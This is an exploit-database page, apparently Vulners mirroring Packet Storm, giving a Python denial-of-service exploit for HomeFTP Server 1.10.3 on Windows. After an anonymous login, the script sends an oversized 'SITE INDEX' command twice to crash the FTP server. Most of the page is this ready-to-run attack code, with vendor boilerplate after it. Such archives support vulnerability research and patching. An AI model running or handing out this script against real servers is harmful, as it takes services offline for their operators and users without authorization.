Lucene search
K

Home FTP Server 1.10.3 Denial Of Service

🗓️ 28 May 2010 00:00:00Reported by Dr_IDEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Home FTP Server 1.10.3 Denial Of Service exploit on Windows

Code
`#!/usr/bin/python  
###################################################################  
#  
# HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit  
# Found By: Dr_IDE  
# Date: May 28, 2010  
# Download: http://downstairs.dnsalias.net/products.html  
# Tested: Windows 7  
#  
###################################################################  
  
import socket, sys  
  
host = (sys.argv[1])  
buff = ("A" * 5000)  
cmds = ('SITE INDEX')  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print ("\r\n[i] Connecting to: " + host +"\r\n")  
print ("[*] Crashing server with command: " + cmds + "\r\n")  
  
try:  
s.connect((host, 21))  
d=s.recv(1024)  
print (d)  
s.send("USER dr_ide\r\n") #anonymous login so anything goes  
d=s.recv(1024)  
print (d)  
s.send("PASS dr_ide\r\n")  
d=s.recv(1024)  
print (d)  
s.send(cmds + " " + buff + '\r\n')  
d=s.recv(1024)  
print (d)  
s.send(cmds + " " + buff + '\r\n') #Second time does the trick.  
d=s.recv(1024)  
print (d)  
s.close()  
  
try:  
s.connect((host,21))  
except:  
print ("\r\n[i] Success, Server is Down.")  
except:  
print ("[i] Error")  
  
  
  
# End  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 May 2010 00:00Current
7.4High risk
Vulners AI Score7.4
27